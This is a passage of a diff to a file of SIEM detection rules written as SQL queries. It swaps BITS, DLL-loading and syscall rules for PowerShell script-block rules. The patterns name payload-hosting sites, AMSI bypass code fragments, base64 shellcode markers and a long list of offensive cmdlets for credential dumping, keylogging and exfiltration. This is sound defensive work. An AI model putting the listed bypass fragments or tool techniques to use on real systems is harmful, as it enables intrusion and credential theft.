], - "filename": "win_bits_client_direct_ip_access.yml" + "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "Code Executed Via Office Add-in XLL File", + "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", + "status": "test", + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1197" + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND 
ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Download with BITS to Suspicious Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "status": "test", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.privilege_escalation", + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - 
"title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", - "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "status": "test", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to 
sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.persistence", - "attack.t1554" + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.exfiltration" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." 
+ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. 
They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", "status": "experimental", - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE 
'\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ "attack.execution", - "attack.t1106" + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE 
'%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 
'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText 
